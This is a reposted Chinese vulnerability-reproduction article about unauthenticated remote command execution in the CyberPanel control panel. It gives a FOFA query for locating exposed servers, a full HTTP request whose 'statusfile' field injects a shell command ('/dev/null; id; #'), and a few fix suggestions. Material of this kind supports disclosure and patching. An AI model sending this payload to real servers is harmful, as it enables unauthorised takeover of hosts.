CyberPanel远程命令执行漏洞

admin 2024年11月1日12:53:25评论31 views字数 1045阅读3分29秒阅读模式

免责声明:请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

CyberPanel远程命令执行漏洞
简介
CyberPanel 是一个开源的 Web 控制面板,专为 VPS 和独立服务器设计,旨在简化网站和服务管理。它提供了一个用户友好的界面,使得非技术用户也能轻松管理在线资源。通过 CyberPanel,用户可以方便地进行各种服务器和网站托管任务,例如创建和管理网站、电子邮件账户、数据库、FTP 账户以及 DNS 记录等。
CyberPanel远程命令执行漏洞
漏洞描述
CyberPanel控制面板在/dataBases/upgrademysqlstatus接口处存在远程命令执行漏洞,允许未经身份验证的攻击者可对目标服务器执行任意命令,控制服务器。
CyberPanel远程命令执行漏洞
fofa语法
app="CyberPanel"
CyberPanel远程命令执行漏洞
漏洞复现
OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: closeContent-Length: 33{"statusfile":"/dev/null; id; #"}
CyberPanel远程命令执行漏洞
批量检测(批量检测POC工具请在公众号知识星球获取):
CyberPanel远程命令执行漏洞
CyberPanel远程命令执行漏洞
修复建议
- 及时将系统升级到最新的安全补丁版本
- 限制对 CyberPanel 接口的网络访问
- 实施网络安全监控来检测可疑活动

原文始发于微信公众号(白帽攻防):【漏洞复现】CyberPanel远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月1日12:53:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CyberPanel远程命令执行漏洞https://cn-sec.com/archives/3342292.html

发表评论

匿名网友 填写信息